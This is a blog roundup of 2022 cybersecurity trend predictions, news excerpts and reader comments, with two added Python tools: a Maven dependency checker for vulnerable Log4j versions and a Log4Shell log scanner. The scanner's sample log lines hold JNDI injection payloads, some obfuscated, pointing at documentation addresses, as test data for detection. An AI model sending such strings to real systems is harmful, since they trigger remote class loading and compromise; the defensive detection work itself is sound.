Cyber security trends for 2022

Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.

Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.

Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.

Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware and credential stuffing attacks, cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research, development and investment. Advanced 5G and wireless networks will bring higher traffic capacity, lower latency and increased reliability, and will enable processing and analytics in real time. Edge computing strives to bring real-time computation, data storage and operations closer to the device rather than relying on a central location, avoiding latency issues. Technologies that improve the ability to discover, categorize, monitor, synthesize and automate the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such technology can be used to bolster botnet detection and mitigation, data visualization tools, active malware protection, rootkit detection and mitigation, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored groups and criminal enterprises, are becoming more sophisticated, adapting and automating their search for vulnerabilities and their malware delivery with machine learning, deep learning, artificial intelligence and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.

Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability, named Log4Shell, to infect vulnerable devices. Apache has released several Log4j versions to fix the original vulnerability (CVE-2021-44228) and the follow-on findings in the same software (CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832). Note that CVE-2021-42550, which is often listed alongside them, is a similar configuration-lookup issue in the separate Logback library, not in Log4j.
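The practical question behind the Google numbers is which of your own builds pull log4j-core in transitively, and through which direct dependency. The checker below is an added example, not part of the SecurityWeek article or of any Apache or Google tooling: it parses `mvn dependency:tree` output, keeps the chain of coordinates from each module root, and flags log4j-core versions below the last fix release of their branch (2.17.1 for Java 8 and later, 2.12.4 for the Java 7 branch, 2.3.2 for the Java 6 branch). The sample tree is constructed for illustration and its module and dependency names are invented.

```python
"""Flag vulnerable log4j-core versions in `mvn dependency:tree` output (added example)."""
import re

# Last fix release per maintained branch for CVE-2021-44228, -45046, -45105 and
# -44832: 2.17.1 (Java 8+), 2.12.4 (Java 7 branch), 2.3.2 (Java 6 branch).
FIXED_BY_BRANCH = {(2, 12): (2, 12, 4), (2, 3): (2, 3, 2)}
FIXED_MAIN = (2, 17, 1)

# One tree line: "[INFO] ", a prefix made of 3-character groups ("+- ", "|  ",
# "\- ", "   "), then the coordinate group:artifact:type[:classifier]:version[:scope].
TREE_LINE = re.compile(r"^\[INFO\] ((?:[|+\\\- ]{3})*)(\S+)$")


def parse_version(version: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); a qualifier such as '-beta9' is dropped, so the
    2.0 betas that predate the JNDI lookup are flagged conservatively."""
    nums = version.split("-")[0].split(".")
    parts = tuple(int(p) for p in nums if p.isdigit())
    return (parts + (0, 0, 0))[:3]


def is_vulnerable(version: str) -> bool:
    """True when the version predates the fix release of its branch."""
    v = parse_version(version)
    if v[0] != 2:
        return False  # Log4j 1.x lacks this lookup code path; it has its own, separate advisories
    return v < FIXED_BY_BRANCH.get(v[:2], FIXED_MAIN)


def scan_tree(tree_output: str) -> list:
    """Walk the tree, keeping the chain of coordinates from the module root, and
    record every log4j-core node together with the dependency path that pulled it in."""
    findings, stack = [], []
    for line in tree_output.splitlines():
        m = TREE_LINE.match(line.rstrip())
        if not m or ":" not in m.group(2):
            continue  # plugin banners, separator lines, blank lines
        depth = len(m.group(1)) // 3
        coord = m.group(2)
        stack = stack[:depth] + [coord]
        parts = coord.split(":")
        if parts[0] == "org.apache.logging.log4j" and parts[1] == "log4j-core":
            has_scope = len(parts) >= 5
            version = parts[-2] if has_scope else parts[-1]
            findings.append({
                "module": stack[0],
                "version": version,
                "scope": parts[-1] if has_scope else None,
                "vulnerable": is_vulnerable(version),
                "via": stack[1:-1],  # direct dependency ... parent of log4j-core
            })
    return findings


# Constructed sample: two reactor modules; all names are invented for the example.
SAMPLE_TREE = """\
[INFO] --- maven-dependency-plugin:3.1.2:tree (default-cli) @ shop ---
[INFO] com.example:shop:jar:1.0.0
[INFO] +- org.springframework.boot:spring-boot-starter-log4j2:jar:2.5.6:compile
[INFO] |  +- org.apache.logging.log4j:log4j-slf4j-impl:jar:2.14.1:compile
[INFO] |  \\- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] |     \\- org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
[INFO] \\- org.postgresql:postgresql:jar:42.3.1:compile
[INFO] --- maven-dependency-plugin:3.1.2:tree (default-cli) @ tools ---
[INFO] com.example:tools:jar:1.0.0
[INFO] \\- org.apache.logging.log4j:log4j-core:jar:2.17.1:compile
"""


def report(tree_output: str) -> list:
    """Human-readable lines, vulnerable findings first."""
    lines = []
    for f in sorted(scan_tree(tree_output), key=lambda f: not f["vulnerable"]):
        status = "VULNERABLE" if f["vulnerable"] else "ok"
        path = " -> ".join(f["via"]) or "(direct dependency)"
        lines.append(f"{status:10} log4j-core {f['version']} in {f['module']} via {path}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_TREE)))
```

Run it as `mvn dependency:tree | python3 log4j_tree.py` style input (the sample is wired in for the demo); in a multi-module build each module root resets the chain, so the `via` path always names the direct dependency that needs upgrading or excluding.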

Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
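The "large number of exploit variations" are mostly obfuscations of the same `${jndi:...}` lookup: nested `${lower:j}` / `${upper:j}` case changes, the `${key:-default}` default-value syntax (`${::-j}`, `${env:NaN:-j}`) and URL encoding. The scanner below is an added example, not anything Akamai published: it collapses those lookups from the inside out, the way Log4j's string substitution would, and then matches the de-obfuscated lookup in web server access logs. The log lines are constructed, with addresses from the documentation ranges, and only the lookup forms named above are resolved; a payload built from other lookups is not normalised and would need another resolver.

```python
"""Detect Log4Shell probes in access logs, including obfuscated variants (added example)."""
import re
from urllib.parse import unquote

# Innermost ${...} that contains no further lookup.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation: a JNDI lookup with one of the schemes seen in attacks.
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def _resolve(inner: str) -> str:
    """Evaluate one innermost lookup for the forms attackers abuse: ${lower:x} and
    ${upper:x} case changes, and ${key:-default}, where an undefined key yields
    'default'. Anything else (including jndi: itself) is left as written."""
    head = inner.lower()
    if head.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if head.startswith("upper:"):
        return inner[len("upper:"):].upper()
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    return "${" + inner + "}"


def normalize(text: str, rounds: int = 10) -> str:
    """URL-decode (twice, for double encoding), then collapse nested lookups
    from the inside out until the text stops changing."""
    text = unquote(unquote(text))
    for _ in range(rounds):
        collapsed = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_probe(line: str):
    """Return the normalised ${jndi:...} lookup found in a log line, or None."""
    norm = normalize(line)
    m = JNDI_PATTERN.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    return norm[m.start():end + 1] if end != -1 else norm[m.start():]


def scan_log(lines) -> list:
    """(line number, normalised lookup) for every line carrying a JNDI probe."""
    hits = []
    for number, line in enumerate(lines, 1):
        probe = find_jndi_probe(line)
        if probe:
            hits.append((number, probe))
    return hits


# Constructed access-log lines (Apache combined format); 198.51.100.0/24 and
# 203.0.113.0/24 are documentation ranges, not real attacker infrastructure.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:12:00:01 +0000] "GET /login?user=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/obj}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "${${env:NaN:-j}ndi:dns://198.51.100.7/ping}" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:05 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.5 - - [10/Dec/2021:12:00:06 +0000] "GET /index.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:12:00:07 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for number, probe in scan_log(SAMPLE_LOG):
        print(f"line {number}: {probe}")
```

Matching on the normalised form rather than on the literal string `${jndi:` is what keeps the variants from slipping through; for a "long attack tail" the same normaliser can be run over retained logs to find probes that predate the patch, and the scheme in the reported lookup tells you whether the probe could have fetched a class (ldap, rmi) or was only testing for a DNS callback.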

Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.

Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has emerged: employee burnout.

In 2022, security will be Linux and open-source developers’ job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing, if you can believe Pornhub, which claims Linux users grew by 28% while Windows users declined by 3%. Its real trouble isn’t so much with open source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product,” points out, constant vigilance is needed to secure all software.

The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development: operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.

Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf

“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find the root causes of an incident by looking back at change and anomaly indicators in the network activity.
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.

Mobile phone security is being redone (Kännyköiden tietoturva menee uusiksi)
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in a TEE (Trusted Execution Environment), an isolated execution mode with its own protected memory. The current standard solution for smartphone security is typically built on Arm’s TrustZone technology. The phone’s own security comes from the TEE, and secure boot usually relies on it. The TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by a TEE has not been available in the small microcontrollers used for embedded applications. Manufacturers have promoted secure boot and memory encryption or flash encryption, but these have been pretty weak solutions. Recently, Arm’s TrustZone-M has introduced a new security model for microcontrollers.
In recent years this picture has begun to diversify, and a revolution is now underway. Google has launched a keystore technology that allows an application to generate a system-maintained key and authenticate to services (it still uses the TEE).
In the future, encryption keys, for example, will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s Helsinki System Security Lab (HSSL). Five years ago Intel introduced SGX technology for PC servers, which in essence is a set of security extensions added to the CPU’s instruction set. In this solution, TEE-type protections are provided by a secure enclave. Using such an enclave needs less code than the traditional TEE structure. An enclave is a temporary structure in the device’s memory: it is created only for the security-sensitive task and goes away when that task is complete. This differs significantly from the TEE structure, where a second kernel runs all the time alongside the operating system. When there is no parallel kernel, there is one component less to attack.
In Intel’s SGX, enclave memory comes from a limited Enclave Page Cache (EPC), which restricted the use of enclaves. Intel has sought to overcome this limitation with its newer TDX (Trust Domain Extensions) technology, which protects whole virtual machines. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solutions will also come to smartphones. The new Armv9-A architecture, announced last year, offers a realm mode that is very close to the technologies offered on the server side. With the coming enclaves, an unlimited number of secured environments will in principle be available.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.

Cyber attacks already threaten goods deliveries (Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin)
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools extend cybercrime beyond technically savvy individuals and criminal organizations to everyone. The new “Everything as a Service” model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf

Jarno Limnéll warns of a “cyber pandemic”: an internet disruption could throw the world into chaos again (Jarno Limnéll varoittaa “kyberpandemiasta”: internetin häiriö voi panna maailman taas sekaisin)
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are the scams, and scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in a direction where technology evolves faster and faster, which rather increases the possibility of various disruptions and creates new types of vulnerabilities. There is no seamless security,” Limnéll says. So even with technology, the world will never be finished. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”

Cyber attacks are accelerating, but companies can respond to them (Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin)
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight and automation are critical to risk management and employee protection.
The shift of workers to remote work has opened up new avenues for attackers, so the attack surface of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Trend Micro’s recommendations are:
• Enhanced server security and application management policies to combat ransomware extortion
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• A Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• An Extended Detection and Response (XDR) model to detect attacks on large networks

Trend Micro report: in the future everything is at risk (Trend Micron raportti: tulevaisuudessa kaikki on vaarassa)
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.

3,062 Comments

  1. Tomi Engdahl says:

    Russia’s ‘Oculus’ to use AI to scan sites for banned information https://www.bleepingcomputer.com/news/security/russias-oculus-to-use-ai-to-scan-sites-for-banned-information/
    Russia’s internet watchdog Roskomnadzor is developing a neural network that will use artificial intelligence to scan websites for prohibited information. Called “Oculus,” the automatic scanner will analyze URLs, images, videos, and chats on websites, forums, social media, and even chat/messenger channels to locate material that should be redacted or taken down. Examples of information targeted by Oculus include homosexuality “propaganda,” instructions on manufacturing weapons or drugs, and misinformation that discredits official state and army sources.

  2. Tomi Engdahl says:

    New tool checks if a mobile app’s browser is a privacy risk https://www.bleepingcomputer.com/news/security/new-tool-checks-if-a-mobile-apps-browser-is-a-privacy-risk/
    A new online tool named ‘InAppBrowser’ lets you analyze the behavior of in-app browsers embedded within mobile apps and determine if they inject privacy-threatening JavaScript into websites you visit. The tool was created by developer Felix Krause who warned of this potentially risky behavior earlier in the month, explaining how easy it would be for in-app browsers to track anything the users see and do online by injecting JavaScript trackers on every web page they visit.

  3. Tomi Engdahl says:

    A little-known attack takes your money; a clear sign on your phone reveals the danger https://www.is.fi/digitoday/tietoturva/art-2000009013238.html
    Various online scams are talked about a lot, but one form of crime is relatively unfamiliar to the general public. What if someone simply hijacked your phone subscription into their own name and stole your data and money? Security company Check Point explains what this kind of scam is about. SIM swapping is an attack in which the victim’s phone subscription is hijacked onto another SIM card by invalidating the old SIM card. For the attack, the criminal must first succeed in stealing the victim’s personal information, such as their personal identity code, phone number and full name. This can happen, for example, through phishing or as a result of a data breach. After that, the crook can contact the victim’s mobile operator and impersonate the victim using this information.
    The criminal may even walk into the operator’s physical store to obtain a new SIM card with the victim’s details. The criminal puts the new SIM card in their own phone, at which point they have broad access to the victim’s data.

  4. Tomi Engdahl says:

    Hackers target hotel and travel companies with fake reservations https://www.bleepingcomputer.com/news/security/hackers-target-hotel-and-travel-companies-with-fake-reservations/
    A hacker tracked as TA558 has upped their activity this year, running phishing campaigns that target multiple hotels and firms in the hospitality and travel space. The threat actor uses a set of 15 distinct malware families, usually remote access trojans (RATs), to gain access to the target systems, perform surveillance, steal key data, and eventually siphon money from customers. In 2022, TA558 switched from using macro-laced documents in its phishing emails and adopted RAR and ISO file attachments or embedded URLs in the messages.
    The phishing emails that initiate the infection chain are written in English, Spanish, and Portuguese, targeting companies in North America, Western Europe, and Latin America. The email topics revolve around making a booking on the target organization, pretending to come from conference organizers, tourist office agents, and other sources that the recipients can’t easily dismiss. In most of the cases Proofpoint observed this year, the payload was AsyncRAT or Loda, while Revenge RAT, XtremeRAT, CaptureTela, and BluStealer were also deployed on a smaller scale.

  5. Tomi Engdahl says:

    Scammers fool people with the same trick year after year; no end in sight https://www.is.fi/digitoday/tietoturva/art-2000009007888.html
    Scam messages sent by SMS cause Finns significant financial losses. Falling for the messages is made easier by the fact that they appear to come from a genuine source. A scammer’s text message about an arriving parcel often shows up in the same message thread as Posti’s genuine messages. A bank scammer, in turn, intrudes into the same thread as the real SMS confirmation codes sent by S-Pankki. The reason is that the sender of a text message is easy to forge. According to telecom operators, the problem is difficult to tackle, since the technology used in text messages really does allow the sender of a message to be set completely freely.

  6. Tomi Engdahl says:

    Researchers Find Counterfeit Phones with Backdoor to Hack WhatsApp Accounts https://thehackernews.com/2022/08/researchers-find-counterfeit-phones.html
    Budget Android device models that are counterfeit versions associated with popular smartphone brands are harboring multiple trojans designed to target WhatsApp and WhatsApp Business messaging apps. The trojans, which Doctor Web first came across in July 2022, were discovered in the system partition of at least four different smartphones: P48pro, radmi note 8, Note30u, and Mate40

  7. Tomi Engdahl says:

    Many Media Industry Vendors Slow to Patch Critical Vulnerabilities: Study
    https://www.securityweek.com/many-media-industry-vendors-slow-patch-critical-vulnerabilities-study

    A cybersecurity analysis of hundreds of media industry vendors showed that many companies are slow to patch critical vulnerabilities, according to MDR and third-party risk management provider BlueVoyant.

    The media industry faces various types of cybersecurity incidents, including content leaks on torrent sites and dark web forums, disruptions to the channels used to deliver content to consumers, and other disruptive attacks, such as ransomware and denial of service (DoS).

    BlueVoyant has analyzed nearly 500 vendors. This includes 49 companies that supply content management, production, monetization and distribution services to most media companies, and 436 firms that represent suppliers whose products and services are widely used but not common across the entire industry.

    Of all these companies, 143 had what the security firm calls ‘zero tolerance findings’, which are critical vulnerabilities in internet-facing systems that are commonly targeted by threat actors.

    One or more such vulnerabilities were identified at roughly 30% of media vendors, which BlueVoyant says is nearly double compared to the multi-industry average it has observed across more than one million companies.

  8. Tomi Engdahl says:

    Lloyd’s of London Introduces New War Exclusion Insurance Clauses
    https://www.securityweek.com/lloyds-london-introduces-new-war-exclusion-insurance-clauses

    Lloyds of London, which describes itself as ‘the world’s leading insurance and reinsurance marketplace’, has clarified its position on war exclusions and cyberattack cover. It will require its underwriters to include such an exclusion based on its definition of cyberwar in future cyber insurance policies.

    The argument is clear and simple: the rising cost of cyber insurance payouts. “In particular, the ability of hostile actors to easily disseminate an attack,” announces (PDF) Lloyd’s, “…means that losses have the potential to greatly exceed what the insurance market is able to absorb.”

    The new exclusion will come into effect from March 2023 at the inception of new or renewal of existing cyber insurance policies. This is not a withdrawal from the cyber insurance market in general, but potentially a retraction from one of industry’s primary causes of concern: geopolitically motivated destructive cyberattacks.

    Over the last few years, the insurance industry has struggled to keep pace with ransomware costs and has been forced to repeatedly increase both premiums and insurance exclusions. Now Lloyd’s is worried about the potential cost of cyberwar.

    A basic war exclusion clause has always been part of insurance – but Lloyds is clarifying (and expanding) its definition of cyberwar. It is making clear that an act of cyberwar is not dependent on a physical declaration of war nor the existence of physical (kinetic) hostilities between two or more nations.

    Nor, in fact, does a cyberattack need to be delivered by a recognized state or state actor for it to be classified as an act of cyberwar and therefore excluded from a cyber insurance policy. The result could be contentious.

    Lloyd’s has provided four model clauses from which its underwriters should choose. In each case, an insurance payout is excluded if the attack is attributed to a foreign state. But as with all cyberattacks, attribution can be tricky.

  9. Tomi Engdahl says:

    One-Third of Popular PyPI Packages Mistakenly Flagged as Malicious https://www.darkreading.com/application-security/one-third-pypi-packages-mistakenly-flagged-malicious
    The scans used by the Python Package Index (PyPI) to find malware fail to catch 41% of bad packages, while creating plentiful false positives.
    The scanners tasked with weeding out malicious contributions to packages distributed via the popular open source code repository Python Package Index (PyPI) create a significant number of false alerts, researchers have found.
    According to a Chainguard analysis of PyPI — the main repository for software components used in applications written in Python — the approach catches 59% of malicious packages but also flags a third of popular legitimate Python packages and 15% of a random selection of packages.
    The research aims to create a data set that Python maintainers and the PyPI repository can use to determine the efficacy of their system for scanning projects for malicious changes and supply chain attacks, the Chainguard researchers stated in a Tuesday analysis.

    Reply
  10. Tomi Engdahl says:

    Current-format personal identity codes will run out in a couple of years: it is worth verifying that IT systems can handle the change
    https://www.tivi.fi/uutiset/tv/9237346b-458b-4c4e-9cbc-a9fb54fd5780
